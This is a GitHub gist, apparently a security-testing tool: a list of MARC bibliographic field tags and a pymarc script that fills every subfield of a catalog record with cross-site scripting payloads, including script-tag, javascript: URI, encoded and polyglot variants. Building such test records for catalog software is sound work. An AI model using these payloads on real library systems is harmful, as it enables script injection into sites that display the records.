-
-
Save jamesrf/1179f75ec51da878d0577a21575bffa5 to your computer and use it in GitHub Desktop.
MARC XSS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
010$a | |
020$acz | |
040$acd | |
100$abcqd | |
130$aplsf | |
240$alf | |
245$ahpbc | |
246$a | |
250$a | |
260$abc | |
300$abce | |
490$av | |
500$a | |
504$a | |
505$a | |
520$ab | |
600$abcqdtvxyz2 | |
610$abvxyz2 | |
650$avxyz2 | |
651$avxyz2 | |
700$abcqde4 | |
710$ab | |
740$a | |
800$abcqdtv | |
830$av |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pymarc import Record, Field | |
import string | |
fields_to_create = dict() | |
# from http://www.loc.gov/marc/umb/um07to10.html | |
with open("commonfields.txt") as f: | |
for line in f: | |
x = line.strip().split("$") | |
fields_to_create[x[0]] = list(x[1]) | |
def payload(a): | |
return '"><script>alert("' + a + '");</script>' | |
#return "javascript:alert('XSS')" | |
#return "javascript:alert('XSS')" | |
#return '%253Cscript%253Ealert(\'' + a + '\')%253C%252Fscript%253E' | |
#return "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(" + a + ")//'>" | |
record = Record() | |
for tag in fields_to_create: | |
subfields = [] | |
for sf in fields_to_create[tag]: | |
subfields.append(sf) | |
alert = tag + "-" + sf | |
subfields.append(payload(alert)) | |
record.add_field( | |
Field( | |
tag = tag, | |
indicators = ['0','0'], | |
subfields = subfields | |
) | |
) | |
#copy-paste into flat text editor | |
print(record) | |
# or use this | |
with open('file.dat', 'wb') as out: | |
out.write(record.as_marc()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment